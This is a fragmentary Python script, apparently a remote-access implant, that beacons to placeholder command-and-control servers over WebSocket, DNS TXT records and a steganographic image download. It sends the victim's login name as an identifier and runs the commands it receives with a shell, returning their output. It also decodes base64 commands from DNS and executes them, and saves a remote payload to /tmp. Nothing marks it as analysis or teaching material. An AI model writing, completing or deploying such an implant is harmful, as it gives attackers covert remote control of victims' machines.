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websocket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dns.resolver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C2_WEBSOCKET = "ws://your-c2-server.com/ws"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DNS_C2_DOMAIN = "c2.yourdns.com"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STEGO_URL = "http://your-c2-server.com/stego/payload.png"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execute_command(cmd):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subprocess.check_output(cmd, shell=True).decode()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str(e)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beacon_ws():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ws = websocket.WebSocket()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ws.connect(C2_WEBSOCKET)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ws.send(os.getlogin())  # Send unique identifier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message = ws.recv()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command = json.loads(message).get("cmd", "")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command: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result = execute_command(command)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ws.send(result)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beacon_dns():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response = dns.resolver.resolve(DNS_C2_DOMAIN, "TXT")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command = base64.b64decode(response[0].to_text().strip('"')).decode()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execute_command(command)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fetch_stego_payload():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response = requests.get(STEGO_URL)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with open("/tmp/stego.png", "wb") as f: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f.write(response.content)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covert_execute():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Detect best C2 method (WebSocket &gt; DNS &gt; Stego)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beacon_ws()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beacon_dns()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fetch_stego_payload()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covert_execute()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